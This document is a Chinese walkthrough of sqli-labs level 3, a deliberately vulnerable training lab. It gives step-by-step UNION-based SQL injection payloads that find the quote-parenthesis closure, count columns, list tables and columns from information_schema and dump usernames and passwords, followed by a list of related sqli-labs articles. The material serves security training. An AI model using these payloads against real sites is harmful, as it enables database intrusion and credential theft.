sqli-labs---第三关

简介: sqli-labs---第三关

1、判断什么类型注入


?id=1 正常显示


?id=1' (报错:''1'') LIMIT 0,1')


?id=1'' 正常显示


?id=1'#(报错:''1'') LIMIT 0,1')


可知闭合方式为')


2、查看列数


?id=1') order by 3 --+ (没有报错)


?id=1') order by 4 --+ (报错)


说明有3列

3、使用联合查询查看回显位置(前面为错可以执行后面的)

?id=-1') union select 1,2,3 --+

回显在2,3,列

4、查询数据库名(security)

?id=-1') union select 1,database(),3 --+

5、查询表名(一共爆出四张表,查看敏感表users)


?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();--+

6、查询users表中字段名(查看到了敏感字段id,username,password)

?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users';--+

7、查看字段username和password的信息

 ?id=-1') union select 1,database(),group_concat(username,password) from security.users;--+

为了方便分清楚username和密码,可以用id将信息隔开

  ?id=-1') union select 1,database(),group_concat(username,id,password) from security.users;--+

相关文章
|
7月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
329 0
SQLi LABS Less-26a
SQLi LABS Less-27
第27关使用GET请求传递参数,在url中构造payload即可 源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
349 0
SQLi LABS Less-27
SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号
147 0
SQLi LABS Less-30
SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可
219 0
SQLi LABS Less-29
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-21
21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大
171 0
SQLi LABS Less-21
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
155 0
SQLi LABS Less-16
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
232 0
SQLi LABS Less-25a
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
182 0
SQLi LABS Less-27a
SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号
156 0
SQLi LABS Less-31